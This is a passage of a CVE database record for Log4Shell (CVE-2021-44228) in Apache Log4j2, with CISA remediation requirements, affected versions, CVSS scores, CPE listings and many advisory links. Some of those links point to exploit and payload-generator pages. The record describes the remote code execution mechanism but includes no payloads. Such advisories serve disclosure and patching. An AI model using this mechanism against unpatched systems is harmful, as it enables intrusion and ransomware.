cve-2021-44228
Vulnerability from cvelistv5
Vendor | Product | Version
---|---|---
Apache Software Foundation | Apache Log4j2 | 2.0-beta9 < log4j-core*
CISA Known exploited vulnerability
Data from the Known Exploited Vulnerabilities Catalog
Date added: 2021-12-10
Due date: 2021-12-24
Required action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Used in ransomware: Known
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:17:24.696Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2" }, { "name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "tags": [ "x_transferred" ], "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "name": "DSA-5020", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2021/dsa-5020" }, { "name": "[debian-lts-announce] 20211212 [SECURITY] 
[DLA 2842-1] apache-log4j2 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html" }, { "name": "FEDORA-2021-f0f501d01f", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/" }, { "name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/" }, { "name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2" }, { "name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1" }, { "name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "name": "20211210 A Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "VU#930724", "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://www.kb.cert.org/vuls/id/930724" }, { "tags": [ "x_transferred" ], "url": "https://twitter.com/kurtseifried/status/1469345530182455296" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf" }, { "tags": [ 
"x_transferred" ], "url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html" }, { "tags": [ "x_transferred" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html" }, { "name": "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf" }, { "name": "FEDORA-2021-66d6c484f3", "tags": [ "vendor-advisory", "x_transferred" ], "url": 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html" }, { "tags": [ "x_transferred" ], "url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html" }, { "name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2022/Mar/23" }, { "tags": [ "x_transferred" ], "url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001" }, { "tags": [ "x_transferred" ], "url": "https://github.com/cisagov/log4j-affected-db" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT213189" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "tags": [ "x_transferred" ], "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228" }, { "tags": [ "x_transferred" ], "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html" }, { "name": "20220721 Open-Xchange Security Advisory 2022-07-21", "tags": [ "mailing-list", 
"x_transferred" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/11" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html" }, { "name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2022/Dec/2" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Apache Log4j2", "vendor": "Apache Software Foundation", "versions": [ { "changes": [ { "at": "2.3.1", "status": "unaffected" }, { "at": "2.4", "status": "affected" }, { "at": "2.12.2", "status": "unaffected" }, { "at": "2.13.0", "status": "affected" }, { "at": "2.15.0", "status": "unaffected" } ], "lessThan": "log4j-core*", "status": "affected", "version": "2.0-beta9", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team." } ], "descriptions": [ { "lang": "en", "value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. 
Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects." } ], "metrics": [ { "other": { "content": { "other": "critical" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-502", "description": "CWE-502 Deserialization of Untrusted Data", "lang": "en", "type": "CWE" } ] }, { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400 Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] }, { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-03T00:00:00", "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache" }, "references": [ { "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2" }, { "name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021", "tags": [ "vendor-advisory" ], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3" }, { "url": "https://security.netapp.com/advisory/ntap-20211210-0007/" }, { "url": 
"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032" }, { "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html" }, { "name": "DSA-5020", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2021/dsa-5020" }, { "name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html" }, { "name": "FEDORA-2021-f0f501d01f", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/" }, { "name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "tags": [ "vendor-advisory" ], "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/" }, { "name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2" }, { "name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1" }, { "name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "name": "20211210 A Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021", "tags": [ "vendor-advisory" ], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "VU#930724", "tags": [ "third-party-advisory" ], 
"url": "https://www.kb.cert.org/vuls/id/930724" }, { "url": "https://twitter.com/kurtseifried/status/1469345530182455296" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf" }, { "url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html" }, { "url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html" }, { "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html" }, { "name": "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", "tags": [ "vendor-advisory" ], "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3" }, { "url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html" }, { "url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html" }, { "url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html" }, { "url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html" }, { "url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf" }, { "name": "FEDORA-2021-66d6c484f3", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/" }, { "url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html" }, { "url": 
"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf" }, { "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html" }, { "url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md" }, { "url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html" }, { "url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html" }, { "name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2022/Mar/23" }, { "url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001" }, { "url": "https://github.com/cisagov/log4j-affected-db" }, { "url": "https://support.apple.com/kb/HT213189" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228" }, { "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html" }, { "name": "20220721 Open-Xchange Security Advisory 2022-07-21", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/11" }, { "url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html" }, { "url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html" }, { "name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2022/Dec/2" }, { "url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html" } ], "source": { "discovery": "UNKNOWN" }, "title": "Apache Log4j2 JNDI features do not 
protect against attacker controlled LDAP and other JNDI related endpoints", "x_generator": { "engine": "Vulnogram 0.0.9" } } }, "cveMetadata": { "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "assignerShortName": "apache", "cveId": "CVE-2021-44228", "datePublished": "2021-12-10T00:00:00", "dateReserved": "2021-11-26T00:00:00", "dateUpdated": "2024-08-04T04:17:24.696Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "cisa_known_exploited": { "cveID": "CVE-2021-44228", "cwes": "[\"CWE-20\", \"CWE-400\", \"CWE-502\"]", "dateAdded": "2021-12-10", "dueDate": "2021-12-24", "knownRansomwareCampaignUse": "Known", "notes": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "product": "Log4j2", "requiredAction": "For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.", "shortDescription": "Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.", "vendorProject": "Apache", "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability" }, "nvd": "{\"cve\":{\"id\":\"CVE-2021-44228\",\"sourceIdentifier\":\"security@apache.org\",\"published\":\"2021-12-10T10:15:09.143\",\"lastModified\":\"2024-11-21T06:30:38.047\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. 
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\"},{\"lang\":\"es\",\"value\":\"Las caracter\u00edsticas JNDI de Apache Log4j2 2.0-beta9 hasta 2.15.0 (excluyendo las versiones de seguridad 2.12.2, 2.12.3 y 2.3.1) utilizadas en la configuraci\u00f3n, los mensajes de registro y los par\u00e1metros no protegen contra LDAP controlado por un atacante y otros puntos finales relacionados con JNDI. Un atacante que pueda controlar los mensajes de registro o los par\u00e1metros de los mensajes de registro puede ejecutar c\u00f3digo arbitrario cargado desde servidores LDAP cuando la sustituci\u00f3n de la b\u00fasqueda de mensajes est\u00e1 habilitada. A partir de la versi\u00f3n 2.15.0 de log4j, este comportamiento ha sido deshabilitado por defecto. A partir de la versi\u00f3n 2.16.0 (junto con las versiones 2.12.2, 2.12.3 y 2.3.1), esta funcionalidad se ha eliminado por completo. 
Tenga en cuenta que esta vulnerabilidad es espec\u00edfica de log4j-core y no afecta a log4net, log4cxx u otros proyectos de Apache Logging Services\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:C/I:C/A:C\",\"baseScore\":9.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":8.6,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"cisaExploitAdd\":\"2021-12-10\",\"cisaActionDue\":\"2021-12-24\",\"cisaRequiredAction\":\"For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. 
Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.\",\"cisaVulnerabilityName\":\"Apache Log4j2 Remote Code Execution Vulnerability\",\"weaknesses\":[{\"source\":\"security@apache.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-400\"},{\"lang\":\"en\",\"value\":\"CWE-502\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-917\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.1\",\"versionEndExcluding\":\"2.3.1\",\"matchCriteriaId\":\"03FA5E81-F9C0-403E-8A4B-E4284E4E7B72\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.4.0\",\"versionEndExcluding\":\"2.12.2\",\"matchCriteriaId\":\"AED3D5EC-DAD5-4E5F-8BBD-B4E3349D84FC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.13.0\",\"versionEndExcluding\":\"2.15.0\",\"matchCriteriaId\":\"D31D423D-FC4D-428A-B863-55AF472B80DC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"17854E42-7063-4A55-BF2A-4C7074CC2D60\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*\",\"matchCriteriaId\":\"53F32FB2-6970-4975-8BD0-EAE12E9AD03A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"B773ED91-1D39-42E6-9C52-D02210DE1A94\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF24312D-1A62-482E-8078-7EC24758B710\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"crit
eria\":\"cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E8320869-CBF4-4C92-885C-560C09855BFA\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:siemens:sppa-t3000_ses3000:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"755BA221-33DD-40A2-A517-8574D042C261\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:captial:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2019.1\",\"matchCriteriaId\":\"07856DAA-EDB4-4522-BA16-CD302C9E39EF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7AD819D-D093-472E-AA47-1A925111E4C8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*\",\"matchCriteriaId\":\"2D07A11A-A3C6-4D44-B2E0-A8358D23947A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"61597661-A3B0-4A14-AA6B-C911E0063390\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BB524B33-68E7-46A2-B5CE-BCD9C3194B8B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5F852C6D-44A0-4CCE-83C7-4501CAD73F9F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AA61161C-C2E7-4852-963E-E2D3DFBFDC7B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A76AA04A-BB43-4027-895E-D1EACFCDF41B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2A6B60F3-327B-49B7-B5E4-F1C60896C9BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4BCF281E-B0A2-49E2-AEF8-8691BDCE08D5\"},
{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A87EFCC4-4BC1-4FEA-BAA4-8FF221838EBD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:e-car_operation_center:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-13\",\"matchCriteriaId\":\"B678380B-E95E-4A8B-A49D-D13B62AA454E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4557476B-0157-44C2-BB50-299E7C7E1E72\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"991B2959-5AA3-4B68-A05A-42D9860FAA9D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7E5948A0-CA31-41DF-85B6-1E6D09E5720B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4C08D302-EEAC-45AA-9943-3A5F09E29FAB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D53BA68C-B653-4507-9A2F-177CF456960F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1F0C3D5E-579F-42C6-9D8C-37969A1D17D2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2C16C460-9482-4A22-92AC-1AE0E87D7F28\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:gma-manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"8.6.2j-398\",\"matchCriteriaId\":\"0E180527-5C36-4158-B017-5BEDC0412FD6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:h